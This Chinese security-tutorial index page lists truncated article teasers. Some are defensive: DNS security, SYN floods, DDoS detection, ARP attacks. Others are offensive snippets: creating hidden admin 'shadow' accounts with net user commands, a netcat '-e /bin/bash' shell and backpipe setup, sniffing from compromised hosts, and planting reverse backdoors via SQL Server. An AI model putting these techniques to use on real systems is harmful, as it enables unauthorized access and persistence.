安全教程

众所周知，DNS作为一项互联网基础业务，对整个互联网的正常运行起着至关重要的作用。当然，别有用心的攻击者也同样明白这个道理，总是希望通过各种各样的攻击手段破坏DNS解析服务的正常开展。 如何从不同层面综合运营，保证DNS服务安全高效的运行，一直以来都是...

1.1 域名系统(Domain Name System) DNS即Domain Name System 的缩写，域名系统以分布式数据库的形式将域名和IP地址相互映射。DNS协议即域名解析协议，简单的说：DNS是用来解析域名的。有了DNS我们就不用再记住...

很多朋友在嗅探的时候肉猪一不小心就挂了.那个后悔啊….. 当然 你要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用罗. 这样会大大的减少当机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好...

一、为什么Syn Flood会造成危害 这要从操作系统的TCP/IP协议栈的实现说起。当开放了一个TCP端口后，该端口就处于Listening状态，不停地监视发到该端口的Syn报文，一旦接收到Client发来的Syn报文，就需要为该请求分配一个TCB（...

互联网生活促成了庞大的账户密码数据，怎样设置自己登陆密码最安全？什么样的密码难破解？据媒体报道表情符号将成最安全的密码。 什么样的密码难破解最安全？表情符号成最安全的密码 来自英国的安全软件开发公司Intelligent Environments6月1...

*net user 查看用户列表　　*net user 用户名 密码 /add 添加用户　　*net user 用户名 密码 更改用户密码　　*net localgroup administrators 用户名 /add 添加用户到管理组　　*net ...

关于FastNetMon 这是一个基于多种抓包引擎（NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP）的DoS/DDoS攻击高效分析工具，可以探测和分析网络中的异常流量情况，同时可以通过外部脚本通知或阻断攻击。 ...

影子帐号： 见名思义，帐号具有隐蔽性，不容易被发现（只是在一定程度上）。即一般的菜鸟发现不了。 多余的话我在这里就不说了，进入正题： 首先，我们需要在命令提示符窗口即就是dos下创建一个用户。 需要以下命令： net user $a 123 /add(...

NC的原生做法： nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样 先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /tmp/backpipe p然后管道一边接入shell...

一、首先诊断是否为ARP病毒攻击 1、当发现上网明显变慢，或者突然掉线时，我们可以用arp-命令来检查ARP表：（点击“开始”按钮-选择“运行”-输入“cmd”点击"确定...

例子: 1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门. 2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer fin...

我用到的工具是phpsocks和大家经常翻墙用的goagent，两款软件相对比，各有优势，phpsocks需要连接数据库，不过这个问题可以通过自 己修改下他的PHP脚本和java客户端即可解决，昨天想改一下这个程序，然后被各种事情打断没时间弄，等有时间...